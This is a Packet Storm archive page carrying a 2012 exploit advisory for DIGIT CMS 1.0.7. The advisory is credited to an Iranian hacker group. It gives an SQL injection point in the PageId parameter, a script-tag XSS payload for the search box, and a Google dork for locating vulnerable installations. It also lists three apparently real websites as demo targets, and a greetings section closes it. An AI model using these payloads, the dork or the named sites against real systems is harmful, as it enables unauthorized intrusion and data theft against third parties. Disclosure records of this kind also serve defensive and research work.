exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DIGIT CMS 1.0.7 Cross Site Scripting / SQL Injection

DIGIT CMS 1.0.7 Cross Site Scripting / SQL Injection
Posted Jan 7, 2012
Authored by Net.Edit0r, BHG Security Center, G3n3Rall

DIGIT CMS version 1.0.7 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | f35ad762f228af8f8a3487ef7a01c9305f2268b1bd8b4832da330c23b01fc3d0

DIGIT CMS 1.0.7 Cross Site Scripting / SQL Injection

Change Mirror Download
# Exploit Title: DIGIT Cms SQL Injection / XSS Multiple Vulnerability
# Date: 2012-01-05 [GMT +7]
# Author: BHG Security Center
# Software Link: http://www.dig-it.co.il/
# Vendor Response(s): They didn't respond to the emails.
# Dork: intext:"Site by DIGIT"
# Version : [1.0.7]
# Tested on: ubuntu 11.04
# CVE : -
# Finder(s):
- Net.Edit0r (Net.edit0r [at] att [dot] net)
- G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)

-----------------------------------------------------------------------------------------
DIGIT Israel Cms SQL Injection / XSS Multiple Vulnerability
-----------------------------------------------------------------------------------------

Author : BHG Security Center
Date : 2012-01-05
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------

PoC/Exploit:
~~~~~~~~~~

~ [PoC] ~: /website_path/Default.asp?sType=0&PageId=[Sqli]

~ [PoC]Http://[victim]/path/Default.asp?sType=0&PageId=[Sqli]


Enter In Search Box XSS Code ~

<FORM action="Default.asp?PageId=-1" method=POST id=searchFORM
name=searchFORM style="margin:0;padding:0">
<INPUT type="hidden" value="" name="txtSEARCH">
</FORM>

~ [PoC] ~: Http://[victim]/path/Default.asp

Note: There are vulnerabilities in the search field that you can use


Demo URL:
~~~~~~~~~

- http://www.sdle.co.il/Default.asp?sType=0&PageId=57499'

- http://www.alumgold.co.il/Default.asp?sType=0&PageId=59972'

- http://www.hb-raanana.com/Default.asp?sType=0&PageId=60413'

XSS ~

http://www.sdle.co.il/Default.asp

"><script>alert(0)</script> Java Code For Search Box



Timeline:
~~~~~~~~~
- 02 - 01 - 2012 bug found.
- 03 - 01 - 2012 vendor contacted, but no response.
- 05 - 01 - 2012 Advisories release.

Important Notes:
~~~~~~~~~

- Vendor did not respond to the email as well as the phone. As there
is not any contact form or email address in

- the website, we have used all the emails which had been found by
searching in Google such as support, info, and so on.

---------------------------------------------------------------------------
Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | Mr.XHat |NoL1m1t |Bl4ck.Viper

Spical Th4nks: B3hz4d | ArYaIeIrAN| _SENATOR_ |Cyber C0der And All My Friendz

[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ
-------------------------------- [ EOF ] ----------------------------------
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close